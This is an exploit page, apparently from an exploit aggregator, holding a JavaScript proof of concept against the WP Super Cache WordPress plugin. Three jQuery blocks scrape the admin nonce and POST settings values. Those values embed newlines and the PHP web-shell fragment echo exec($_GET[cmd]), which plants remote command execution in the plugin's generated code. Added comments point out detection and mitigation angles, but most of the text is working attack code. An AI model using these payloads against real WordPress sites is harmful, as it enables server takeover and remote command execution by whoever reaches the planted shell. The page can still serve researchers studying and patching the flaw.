## https://sploitus.com/exploit?id=WPEX-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
//Exploit $cache_path
// Flow, as written: GET the plugin settings tab, scrape the page's _wpnonce
// value with a regex, then POST a "scupdates" form whose wp_cache_location
// value carries embedded newlines plus a PHP `echo exec($_GET[cmd])` fragment.
// Risk: a settings value is only dangerous here if the plugin writes it into
// an executable file without escaping; newline/PHP-token content in a plugin
// option is the signal a defender should alert on.
// NOTE(review): jQuery is called with no explicit credentials, so this appears
// to rely on running inside an already-authenticated admin browser session
// (cookies + page nonce) — confirm; that is also why the nonce check alone does
// not stop it.
// `url` is assigned without const/let, so it becomes an implicit global.
url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
// Throws a TypeError if the page has no _wpnonce field (e.g. not logged in).
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_enabled": 1,
// Newlines end the intended config line; `#` comments out whatever follows.
"wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
})
// Logged as soon as the POST is issued, not when it completes.
console.log('SET!');
// .then is attached to the GET's jqXHR, so it fires when the GET settles.
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_enabled": 1,
// Second POST restores wp_cache_location to a benign value.
"wp_cache_location": "./"
})
});
console.log('EXPLOIT!');
});
//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text
// Same pattern as the settings-tab variant, applied to the debug tab: scrape
// the nonce, POST wp_cache_debug=1 with a wp_cache_debug_ip value that embeds
// newlines and a PHP fragment, then reset the field to "1".
// The commented-out wp_super_cache_front_page_text lines indicate a second
// field the author believed was written the same way; the script does not
// exercise it.
// Mitigation angle: any value stored by this tab should be validated against
// its expected type (an IP address / plain text), which rejects newlines.
// `[Target]` is a placeholder host left in by the author.
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';
jQuery.get(url,function(e){
jQuery.post(url,{
"wp_cache_debug": 1,
// Throws a TypeError if the page has no _wpnonce field.
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
//"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
})
// Logged when the POST is issued, not when it completes.
console.log('SET!');
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"wp_cache_debug": 1,
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
// Restores the field to a benign value.
"wp_cache_debug_ip": "1"
//"wp_super_cache_front_page_text": "1"
})
});
console.log('EXPLOIT!');
});
//Exploit $cache_scheduled_time + $cached_direct_pages
// Three chained steps on the settings tab: (1) POST scupdates to enable the
// cache, (2) POST an "expirytime" form whose cache_scheduled_time starts with a
// newline and whose new_direct_page value contains backticks and a PHP
// `echo` of $_GET[cmd], (3) repeat the expirytime POST with a well-formed time.
// NOTE(review): the backtick-wrapped values suggest the author expected these
// fields to land inside a backtick-delimited string in generated code —
// presumably the plugin's config; the page does not show where they are
// written, so treat that as unconfirmed.
// Detection/mitigation: a scheduled-time value that is not HH:MM, or a
// direct-page path containing backticks, `;` or `$`, should be rejected by
// the settings handler and is a clear indicator if found in stored options.
// `url` is reassigned here as an implicit global, like the earlier blocks.
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
jQuery.post(url,{
"action": "scupdates",
"wp_cache_enabled": "1",
// Throws a TypeError if the page has no _wpnonce field.
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
})
// Logged when the POST is issued, not when it completes.
console.log('SET1!');
}).then(()=>{
jQuery.get(url,function(e){
jQuery.post(url,{
"action":"expirytime",
// Leading newline breaks out of the intended line; "`:00" closes a backtick.
"cache_scheduled_time": "\n`:00",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"new_direct_page":"`;echo`$_GET[cmd]`;#"
})
}).then(()=>{
console.log('EXPLOIT!');
jQuery.get(url,function(e){
jQuery.post(url,{
"action":"expirytime",
// Well-formed time; new_direct_page is re-sent unchanged.
"cache_scheduled_time": "00:00",
"_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
"new_direct_page":"`;echo`$_GET[cmd]`;#"
})
})
});
// Runs right after the first GET's callback returns.
console.log('SET2!');
});